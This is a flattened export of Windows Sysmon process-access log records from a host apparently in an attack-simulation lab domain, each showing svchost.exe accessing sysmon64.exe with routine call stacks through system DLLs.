08:41:22.341{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001446Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.341{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001445Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.341{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001444Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.341{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001443Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.341{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001442Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.340{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001441Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.340{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001440Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.340{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001439Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.340{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001438Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.340{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001437Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.340{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001436Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.340{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001435Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.340{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001434Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001433Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001432Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001431Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001430Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001429Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001428Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001427Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001426Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001425Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001424Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.324{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001423Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 